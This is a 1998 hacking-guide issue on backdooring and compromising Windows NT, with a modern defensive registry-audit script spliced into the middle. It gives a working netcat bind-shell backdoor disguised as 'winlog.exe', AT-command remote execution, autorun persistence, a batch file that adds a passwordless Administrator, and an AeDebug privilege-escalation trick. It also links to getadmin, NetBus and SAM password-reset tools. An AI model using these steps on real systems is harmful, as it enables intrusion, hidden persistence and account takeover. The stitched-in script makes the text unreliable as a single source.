__________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 10 Part 2
How to Break into Windows NT: Backdoors
and Practical Jokes
____________________________________________________________
by keydet89@yahoo.com
[Backdoors and Practical Jokes]
Creating backdoors is how you ensure your ability to return to the system at will. This is almost a black art when dealing with Un*x systems, and it can also be done on NT.
netcat, from Weld Pond, takes advantage of any user's ability to use a local port. netcat is a command-line utility that has several switches used to configure its operation. This makes netcat, combined with a properly configured command line launched from a batch file, an excellent choice for a backdoor.
(get netcat for NT from http://www.l0pht.com/weld)
The batch file needs to contain:
nc -L -d -p [port] -t -e cmd.exe
-L  tells netcat to keep listening after the current session terminates
-d  detach - don't open a DOS window when running (IMPORTANT)
-p  which port to bind to
-t  enable telnet negotiations
-e  command to execute upon connection
Copy this command line into a batch file named "runnc.bat" or something similar. Then copy both the netcat executable file and the batch file to a directory that is in the PATH on the target machine...c:\winnt\system32\ is a good place to hide them. Another little trick to keep in mind is to rename the netcat executable from 'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to make the appropriate changes to the batch file). That way, when you or your buddy opens the TaskList, there won't seem to be any 'unusual' programs running. Run the batch file on your own machine, and open the TaskList (right-click on the TaskBar, and choose TaskList)...
Once this batch file is run, all you need to do is connect via telnet, or netcat in client mode:
c:\>nc -v [ipaddress of target] [port]
So how do you run this batch file? By default, NT doesn't have an interactive telnet server installed so that you can just log in, so what do you do? Well, there is a great little service called the Schedule (or 'AT') service, which lets you schedule programs to be run at a later date. To see if your Schedule service is running, you can either click Control Panel -> Services and check it, or, if you have Perl installed (see above), you can run the following script to see if the service is running and, if not, start it:
----- begin script -----
# atchk.plx
# Script checks to see if the AT (Schedule) service is running on
# the local machine...if not, starts it. Minor modifications will
# allow you to do the same thing on a remote machine, once you
# have successfully completed the IPC$ connection and have
# Administrator rights.
#
# usage: perl atchk.plx
use strict;
use Win32::Service;
use Win32;

my %status;
# An empty host name means the local machine
Win32::Service::GetStatus('', 'Schedule', \%status)
    || die "Can't query service status\n";
# CurrentState 4 == SERVICE_RUNNING
die "service is already started\n" if ($status{CurrentState} == 4);
Win32::Service::StartService(Win32::NodeName(), 'Schedule')
    || die "Can't start service\n";
print "Service started\n";
#**Note: This script was modified from:
#http://www.inforoute.cgs.fr/leberre1/perlser.htm
----- end script -----
Note: Only Administrators or members of the Administrators group can run the AT command.
Once installed, the 'runnc.bat' file can be executed via the AT command. The necessary syntax for the AT command is:
AT [\\computername] [time] "command"
or more particularly:
AT [\\computername] [time] runnc.bat
References to commands can be hidden in various places within the registry, set to run when a user logs in:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Note: This last key is where you will find things like AOL's Instant Messenger. The install puts the reference to the app there, but you won't find it in your StartUp box...
Here's another little exercise that you should run on your own machine first, and then try copying it over to a friend's machine and running it via the AT command. The batch file below uses commands that are native to NT to create a new user account, then make that user a member of the Administrators group:
----- begin batch file -----
@echo off
rem Create a local account named Admin that never expires and needs no password
net user Admin /add /expires:never /passwordreq:no
rem Move the new account out of the Users group and into Administrators
net localgroup Administrators Admin /add
net localgroup Users Admin /delete
----- end batch file -----
What are some other neat little tricks to try? Get Netbus from http://netbus.hypermart.net/ . This little program is similar to Back Orifice, and it runs on NT. (Visit the makers of Back Orifice at http://www.cultdeadcow.com/)
Okay, so you and your 'leet buddies have played around with each other's machines via the Internet, and pretty much walked through the exercises listed above. Now, what are some local 'attacks' that you can run against your own machine?
[Local Attacks]
Let's say you have a couple of accounts on your NT box, at least one with Admin rights, and one or two others with user rights. You've already run through the password cracking exercise and seen how easy it is to get the 'SAM._' file and crack it. So what else can you do?
Well, try the 'getadmin' exploit. This exploit consists of a program and a .dll file that will add the user to the Administrators group. Get the necessary files from:
http://www.nmrc.org/files/nt/index.html
The Microsoft site has a hotfix for the "getadmin" exploit, located at:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/getadmin-fix/
General information on security problems addressed by Microsoft can be found at:
http://www.microsoft.com/security/issues.htm
For more information on the 'getadmin' exploit, go to:
http://www.ntsecurity.net
and search for 'getadmin'.
All you need to do to test this exploit is log onto your system via a user account, copy the files into a directory, and run getadmin.exe.
Another local exploit similar to the "getadmin" exploit has popped up. The exploit works like this: the user runs a program called "sechole.exe" and the final result (possibly after a reboot) is that the user now has administrator rights! For more information on this and the zipped archive "sechole.zip", go to:
http://www.technotronic.com/microsoft.html
A variation on this exploit involves the Registry setting that determines the default debugger (the program run when a user mode program crashes). Usually, the setting is:
Hive: HKEY_LOCAL_MACHINE
Key: \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Value: Debugger
Data Type: REG_SZ
Default Value: drwtsn32 -p %ld -e %ld -g
The "Everyone" group has the ability to set the value of this key, and this is essentially how you can exploit it. The debugger runs in the security context of the crashed application, so all you need to do is change the Default Value (via 'regedit') to point to the User Manager, and then crash one of the services that are running. Then you can add accounts with the User Manager...even to the Administrators group.
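Both registry spots described above (the Run/RunServices autostart keys and the AeDebug Debugger value) are things an administrator can audit from a regedit export. The following Python is an added defensive example, not part of the original guide: it parses a REGEDIT4-style export, diffs the autorun entries against a known-good baseline, and compares the Debugger value with the default quoted above. The export text, the baseline, and the names 'notadebugger.exe' and 'runnc.bat' are constructed placeholders.

```python
import re
# NT 4 default debugger command line as the guide quotes it
DEFAULT_DEBUGGER = "drwtsn32 -p %ld -e %ld -g"
AEDEBUG_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AeDebug"
AUTORUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
)
# One REG_SZ line of a .reg export: "name"="data", or @="data" for the default value
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=("(?:[^"\\]|\\.)*")$')

def _unquote(s):
    # Drop the surrounding quotes and undo the \\ and \" escapes regedit writes
    return s[1:-1].replace('\\"', '"').replace("\\\\", "\\")

def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the REG_SZ values in a .reg file."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):   # [HKEY_...\Key] header
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and (m := VALUE_RE.match(line)):
            name = "(Default)" if m.group(1) == "@" else _unquote(m.group(1))
            keys[current][name] = _unquote(m.group(2))
    return keys

def audit(export_text, baseline):
    """Return (kind, key, name, data) findings: a non-default AeDebug debugger,
    plus every autorun entry that is new or changed relative to the baseline."""
    reg = parse_reg_export(export_text)
    findings = []
    debugger = reg.get(AEDEBUG_KEY, {}).get("Debugger")
    if debugger is not None and debugger != DEFAULT_DEBUGGER:
        findings.append(("aedebug", AEDEBUG_KEY, "Debugger", debugger))
    for key in AUTORUN_KEYS:
        for name, cmd in sorted(reg.get(key, {}).items()):
            if baseline.get(key, {}).get(name) != cmd:
                findings.append(("autorun", key, name, cmd))
    return findings

# Constructed sample export: a tampered AeDebug value and a hidden batch file in Run
SAMPLE_EXPORT = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AeDebug]
"Debugger"="c:\\temp\\notadebugger.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"Winlog"="c:\\winnt\\system32\\runnc.bat"
"""
# Constructed known-good snapshot taken when the machine was first set up
BASELINE = {AUTORUN_KEYS[0]: {"SystemTray": "SysTray.Exe"}}
```

Running audit(SAMPLE_EXPORT, BASELINE) reports the changed Debugger value and the unbaselined 'Winlog' entry while leaving the known SysTray entry alone.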
*******************************************************************
NEWBIE NOTE: Before any changes are made to the Registry, make sure that you make a backup of your current Registry using the "rdisk /s" utility. You can make changes to the Registry by clicking Start -> Run, and entering either 'regedit' or 'regedt32'. Before you attempt any of this, read the files pertaining to the Registry from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/) and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).
*******************************************************************
Another local exploit that you can attempt uses the NTFSDOS utility, which is nothing more than a bootable DOS diskette that can read (but not write to) NTFS partitions. This would potentially allow an attacker to make off with copies of system files, including the SAM database. The folks at Systems Internals (http://www.sysinternals.com) have not only an NTFSDOS utility available, but also some tools that give the user limited write capability. SysInternals also has NTRecover and NTLocksmith, along with a variety of other useful tools. Get a copy of the utility, and try booting your own system with the diskette in the A:\ drive.
There is a nifty little utility available, one that is essentially a Linux boot disk:
http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
The utility comes with rawrite.exe, so that DOS and Windows users can download the utility and create the Linux boot disk. The utility is an NTFS-bootable minimal kernel, with a small program that allows the user to change any password in the SAM database. Alternatively, you can find the Linux binary file (without the rawrite.exe utility) at:
http://www.nmrc.org/files/snt/index.html
called bootdisk.bin, and according to the description, this is the file you are interested in. You will still need to get a copy of rawrite.exe, in order to write the information to a diskette in a usable form.
Carefully read the instructions on the web page for the utility (listed above) and if you are feeling especially '31337', try it out against your own system.
[Final Words]
By now you should be familiar with some of the methods used to attack and compromise an NT system. Hopefully, you have seen fit to try out the exercises on your own system, or against a friend's system (with permission, of course). And it should start becoming clear what it takes to secure a system from attack. The first step is to become familiar with various exploits by regularly visiting such sites as RootShell (http://www.rootshell.com), the ISS X-Force site (http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net), and NTBugTraq (http://www.ntbugtraq.com). Then go to the Microsoft Support (http://support.microsoft.com) and Security (http://www.microsoft.com/security) sites to see what the 'official' fixes are...the NTBugTraq site does a great job of keeping track of the latest hotfixes, and which ones are obsolete. The Microsoft Support site is especially useful, because you can search for information or specific KnowledgeBase articles, and print out those that you find useful. The "Hardening NT" document from Santeria Systems (http://pw2.netcom.com/~honeyluv/index.html) provides an excellent guide for protecting your system, complete with references to the appropriate KnowledgeBase article for each step. Finally, Microsoft maintains a list of security bulletins at:
http://www.microsoft.com/security
_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests?
Check out the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you have committed!
© 1998 keydet89. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_________________________________________________________